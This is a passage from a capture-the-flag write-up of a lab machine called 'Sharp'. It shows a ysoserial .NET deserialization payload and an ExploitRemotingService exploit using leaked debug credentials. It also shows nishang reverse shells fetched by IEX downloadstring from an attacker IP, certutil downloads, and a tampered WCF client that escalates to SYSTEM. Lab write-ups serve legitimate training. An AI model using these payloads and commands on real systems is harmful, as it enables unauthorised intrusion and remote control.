<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/d5472ff779764567a998aa75bb40f8f4" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port 8888 has a secret .NET remoting endpoint:</span></span><div id="https://www.notion.so/877e295910cf4b03b58b9ce497f7758a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">tcp://localhost:8888/SecretSharpDebugApplicationEndpoint</code></span></span></p></div></li><li id="https://www.notion.so/358570628de34916a3c0dcb72a5f889d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">With debug credentials:</span></span><div id="https://www.notion.so/5c8a716673d8498888aa68841711b7d8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">debug:SharpApplicationDebugUserPassword123!</code></span></span></p></div></li></ul><div id="https://www.notion.so/29fcdc0f3e5c420e89e8fcc5c57adf92" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Getting a reverse shell through .NET remoting service with ExploitRemotingService:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/2ad8e4631649457a9d341ebedd1f4464" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using nishang's </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Invoke-PowerShellTcp</code></span><span class="SemanticString"> module, add a one-liner at the EOF to make the server trigger the reverse shell:</span></span><div id="https://www.notion.so/476c395825ce46bc911357630101ddbd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 6969</code></span></span></p></div></li><li id="https://www.notion.so/276446903cd847259f1a1d2da8b91521" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Now on a Windows VM, serialise the reverse shell payload with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ysoserial</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/d3aef8c966d746ca830bc053772f966b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX(new-object net.webclient).downloadstring('http://10.10.14.26/Invoke-PowerShellTcp.ps1')"</code></span></span></p></div><pre id="https://www.notion.so/ad0796851da44ed0a7f3a57a657594cf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAGwvYyBwb3dlcnNoZWxsIC1jIElFWChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vMTAuMTAuMTQuMjYvSW52b2tlLVBvd2VyU2hlbGxUY3AucHMxJykGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==</span></span></span></code></pre></li><li id="https://www.notion.so/f433409f98c047a090c3df37af0efad9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Host the reverse shell on HTTP:</span></span><div id="https://www.notion.so/c8215f6722e94a4cacc5a2e5b38c2c98" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> python3 -m http.server 80</code></span></span></p></div></li><li id="https://www.notion.so/3d601072c7744cde9f55f648f0615cf2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for a reverse connection on port 6969:</span></span><div id="https://www.notion.so/f2bed158422d451cb0a772c177c4a3ef" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\nc64.exe -lvnp 6969</code></span></span></p></div></li><li id="https://www.notion.so/9689db78220945949d102ea5d638eec8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Build and compile binaries for tyranid/ExploitRemotingService using Visual Studio, this will be used for exploiting CVE-2014-1806 and CVE-2014-4149 on the .NET remoting service.</span></span></li><li id="https://www.notion.so/4b044c89fdfa4276a1b8c5154347ead5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Send payload with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ExploitRemotingService</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/cd8df66a012149a5bb0bfcdeea70a457" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\ExploitRemotingService.exe -v -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw AAEAAAD...</code></span></span></p></div></li><li id="https://www.notion.so/17540d0fdc644cafb5cb28ac96943aa1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Ignoring casting errors:</span></span><pre id="https://www.notion.so/0c7de3f6ee8847409a72a128f0c4df33" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>System<span class="token punctuation">.</span>InvalidCastException: Unable to cast object of <span class="token function">type</span> <span class="token string">'System.Collections.Generic.SortedSet`1[System.String]'</span> to <span class="token function">type</span> <span class="token string">'System.Runtime.Remoting.Messaging.IMessage'</span><span class="token punctuation">.</span>
at System<span class="token punctuation">.</span>Runtime<span class="token punctuation">.</span>Remoting<span class="token punctuation">.</span>Channels<span class="token punctuation">.</span>CoreChannel<span class="token punctuation">.</span>DeserializeBinaryRequestMessage<span class="token punctuation">(</span>String objectUri<span class="token punctuation">,</span> Stream inputStream<span class="token punctuation">,</span> Boolean bStrictBinding<span class="token punctuation">,</span> TypeFilterLevel securityLevel<span class="token punctuation">)</span>
at System<span class="token punctuation">.</span>Runtime<span class="token punctuation">.</span>Remoting<span class="token punctuation">.</span>Channels<span class="token punctuation">.</span>BinaryServerFormatterSink<span class="token punctuation">.</span>ProcessMessage<span class="token punctuation">(</span>IServerChannelSinkStack sinkStack<span class="token punctuation">,</span> IMessage requestMsg<span class="token punctuation">,</span> ITransportHeaders requestHeaders<span class="token punctuation">,</span> Stream requestStream<span class="token punctuation">,</span> IMessage& responseMsg<span class="token punctuation">,</span> ITransportHeaders& responseHeaders<span class="token punctuation">,</span> Stream& responseStream<span class="token punctuation">)</span></span></span></span></code></pre></li><li id="https://www.notion.so/42078e1843504de3a8d72c6390469d8f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We get a HTTP request from the server:</span></span><pre id="https://www.notion.so/bfd6554802d74f778435b654a844f8a0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.10.219 - - [08/Jan/2021 19:36:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -</span></span></span></code></pre></li><li id="https://www.notion.so/834b9865acd24a4c86826a4a35c5c583" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">And at last, we have a shell as lars:</span></span><div id="https://www.notion.so/63abc3ab677b4b5897b5935b64c6ca7c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami</code></span></span></p></div><pre id="https://www.notion.so/43f15df026c34065953ccbd4df20a4f7" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>sharp\lars</span></span></span></code></pre></li><li id="https://www.notion.so/b60e8072a0b741a6b67b0e7604efac8a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/b592d7d5e4114e57a01f6a55b45497ad" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/b592d7d5e4114e57a01f6a55b45497ad"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/a3a1533dcfd34963b5e96d0e1d448778" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Lars has a folder called </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WCF</code></span><span class="SemanticString"> in his </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~\Documents\</code></span><span class="SemanticString"> directory, which was mentioned earlier in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">\\10.10.10.219\dev\notes.txt</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/9bef3972a97b4acabf12bc564b8301fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Migrate from .Net remoting to WCF</span></span></p></div></li><li id="https://www.notion.so/5b70bb4ddd36459abbeb52c06f72c7eb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Windows Communication Foundation (WCF) is a framework for building service applications, which can send data as asynchronous messages from one service to another.</span></span></li><li id="https://www.notion.so/eb2e1d9475e14d8f9d736bd36277644b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Exploring the folder:</span></span><div id="https://www.notion.so/0365f577db01456eb124f964d435f47a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> ls C:\Users\lars\Documents\wcf</code></span></span></p></div><pre id="https://www.notion.so/a25f47cf03d14108b3514b95981c8443" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Directory: C:\Users\lars\Documents\wcf
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/15/2020 1:40 PM .vs
d----- 11/15/2020 1:40 PM Client
d----- 11/15/2020 1:40 PM packages
d----- 11/15/2020 1:40 PM RemotingLibrary
d----- 11/15/2020 1:41 PM Server
-a---- 11/15/2020 12:47 PM 2095 wcf.sln</span></span></span></code></pre></li><li id="https://www.notion.so/c5e391900d864d28a2c69bcdb1278e0c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This appears to be a Visual Studio project directory structure, as hinted by the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wcf.sln</code></span><span class="SemanticString"> file.</span></span></li><li id="https://www.notion.so/8c22647e800b4e7996feebb765a36ee0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Running the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString"> in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~/Documents/wcf/Client/bin/Release/</code></span><span class="SemanticString"> produces:</span></span><div id="https://www.notion.so/f55de93e67dc48cca09064bd5008f8c5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\WcfClient.exe</code></span></span></p></div><pre id="https://www.notion.so/71a0f6b3f6e74340b8e6f4294a2d8e5f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>DeviceID Free(GB) Total(GB)
-------- -------- ---------
C: 30.1521492004395 39.5097618103027
Physical Processors : 2
Logical Processors : 2
Total Memory(GB) : 3
Free Memory(GB) : 3</span></span></span></code></pre></li><li id="https://www.notion.so/50f1799afa3e40f6aecafb038f54a2b2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Seems like it is used to remotely monitor system performance. Given that the service can access CPU info, it is also likely privileged.</span></span></li><li id="https://www.notion.so/c02eb15f1675431882aff1cae9e5ab67" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We can try to exploit the privileged code execution in the client program to have it spawn a reverse shell as root.</span></span></li><li id="https://www.notion.so/f0adb904497a4c4d8531cd37266c8f45" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's zip this directory up and copy it to the dev share, so we can bring it back to our local machine to look deeper:</span></span><div id="https://www.notion.so/75864ed7f05e4376898f844965e4a56a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> Compress-Archive -LiteralPath ~\Documents\wcf -DestinationPath C:\dev\wcf.zip</code></span></span></p></div></li><li id="https://www.notion.so/59a6e7d0eb4a43ce91e5704115e90de5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Download .zip from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">dev</code></span><span class="SemanticString"> share on our local machine:</span></span><div id="https://www.notion.so/037dda48e6e448df810dee52eee59933" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> net use X: \\10.10.10.219\dev</code></span></span></p></div></li><li id="https://www.notion.so/3e5e02d532f144fd8df2e3bdb7f272ab" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Clean up after ourselves:</span></span><div id="https://www.notion.so/f66dd529aad848e7beb394c234a1fc61" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> rm C:\dev\wcf.zip</code></span></span></p></div></li></ul><div id="https://www.notion.so/c431a75be00944fe99bdd5225deed522" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploring WCF client/server project files in Visual Studio:</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/531250f7a0c54622bb668df6341ab8c9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found WCF endpoint under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Program.cs</code></span><span class="SemanticString"> of both client and server:</span></span><pre id="https://www.notion.so/11c97685a58448629e9abdc476b26497" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">new</span> <span class="token constructor-invocation class-name">NetTcpBinding</span><span class="token punctuation">(</span>SecurityMode<span class="token punctuation">.</span>Transport<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token string">"net.tcp://localhost:8889/wcf/NewSecretWcfEndpoint"</span>
<span class="token class-name">Uri</span> baseAddress <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">Uri</span><span class="token punctuation">(</span><span class="token string">"net.tcp://0.0.0.0:8889/wcf/NewSecretWcfEndpoint"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/a0db5e5059074ddeaf62bfe5eb22b1eb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found unused InvokePowerShell() function under Remoting.cs of the RemotingLibrary:</span></span><pre id="https://www.notion.so/b5e8d48c74894b5da03bae4e55e6988f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">public</span> <span class="token return-type class-name"><span class="token keyword">string</span></span> <span class="token function">InvokePowerShell</span><span class="token punctuation">(</span><span class="token class-name"><span class="token keyword">string</span></span> scriptText<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
<span class="token class-name">Runspace</span> runspace <span class="token operator">=</span> RunspaceFactory<span class="token punctuation">.</span><span class="token function">CreateRunspace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
runspace<span class="token punctuation">.</span><span class="token function">Open</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Pipeline</span> pipeline <span class="token operator">=</span> runspace<span class="token punctuation">.</span><span class="token function">CreatePipeline</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
pipeline<span class="token punctuation">.</span>Commands<span class="token punctuation">.</span><span class="token function">AddScript</span><span class="token punctuation">(</span>scriptText<span class="token punctuation">)</span><span class="token punctuation">;</span>
pipeline<span class="token punctuation">.</span>Commands<span class="token punctuation">.</span><span class="token function">Add</span><span class="token punctuation">(</span><span class="token string">"Out-String"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Collection <span class="token punctuation"><</span>PSObject<span class="token punctuation">></span></span> results <span class="token operator">=</span> pipeline<span class="token punctuation">.</span><span class="token function">Invoke</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
runspace<span class="token punctuation">.</span><span class="token function">Close</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">StringBuilder</span> stringBuilder <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token constructor-invocation class-name">StringBuilder</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">foreach</span> <span class="token punctuation">(</span><span class="token class-name">PSObject</span> obj <span class="token keyword">in</span> results<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
stringBuilder<span class="token punctuation">.</span><span class="token function">AppendLine</span><span class="token punctuation">(</span>obj<span class="token punctuation">.</span><span class="token function">ToString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">return</span> stringBuilder<span class="token punctuation">.</span><span class="token function">ToString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/285ed5c89179417587a206e513ced637" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This means we can execute arbitrary code with privileged access. Under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Program.cs</code></span><span class="SemanticString"> of the client, add the following reverse shell payload:</span></span><pre id="https://www.notion.so/7cafa223723746378e024a10bf665109" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Console<span class="token punctuation">.</span><span class="token function">WriteLine</span><span class="token punctuation">(</span>client<span class="token punctuation">.</span><span class="token function">InvokePowerShell</span><span class="token punctuation">(</span>"IEX <span class="token punctuation">(</span><span class="token keyword">new</span><span class="token operator">-</span><span class="token keyword">object</span> net<span class="token punctuation">.</span>webclient<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">downloadstring</span><span class="token punctuation">(</span>'</span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://10.10.14.26/Invoke-PowerShellTcp.ps1"><span>http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">10.10</span><span class="token number">.14</span><span class="token number">.26</span><span class="token operator">/</span>Invoke<span class="token operator">-</span>PowerShellTcp<span class="token punctuation">.</span>ps1</span></a></span><span class="SemanticString"><span>'<span class="token punctuation">)</span>"<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre></li><li id="https://www.notion.so/213425a77471401fa488c70bab217a81" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Build the application and copy both </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfRemotingLibrary.dll</code></span><span class="SemanticString"> to the HTTP server.</span></span></li><li id="https://www.notion.so/4b668e5458d34cee8aad7fe0fd173456" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Since we are using the same reverse shell script, we will also need to change the reverse connection's port under </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Invoke-PowerShellTcp.ps1</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/f028b29ed4954d7d9ad323a5d772afa6" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token function">Invoke-PowerShellTcp</span> <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress 10<span class="token punctuation">.</span>10<span class="token punctuation">.</span>14<span class="token punctuation">.</span>26 <span class="token operator">-</span>Port 4204</span></span></span></code></pre></li><li id="https://www.notion.so/243c542e63564ffe81ce32ecc4658a93" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for a reverse connection on port 4204:</span></span><div id="https://www.notion.so/1ddbd848673240839bc4f2e6d240f10c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\nc64.exe -lvnp 4204</code></span></span></p></div></li><li id="https://www.notion.so/ce7438fb907a4680b66a48280934fdb2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Changing the endpoint address from localhost to 10.10.10.219 did not connect, the server likely listens to localhost requests only.</span></span></li><li id="https://www.notion.so/56c7270fc4bb470e817bd72c2a202984" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">This means we need to upload the modified client and library back onto the machine, and run it locally there.</span></span></li><li id="https://www.notion.so/a4bbec5a2aff4c38b305d0c435e3a7b9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Direct copy to SMB share failed, trying to transfer modified files with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">certutil</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/18ff908113034a828b2b8ff5de408e8c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> certutil -urlcache -split -f "http://10.10.14.26/WcfClient.exe" WcfClient.exe</code></span></span></p></div><div id="https://www.notion.so/0c7aee2b20f745039c1a4c6924d93608" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> certutil -urlcache -split -f "http://10.10.14.26/WcfRemotingLibrary.dll" WcfRemotingLibrary.dll</code></span></span></p></div></li><li id="https://www.notion.so/c984539b36e147d4bc440703d0c16780" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Execute </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">WcfClient.exe</code></span><span class="SemanticString">, and we get a reverse shell on port 4204 as system:</span></span><div id="https://www.notion.so/b95be1df14ec46b88bac6748010903ee" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami /all</code></span></span></p></div><pre 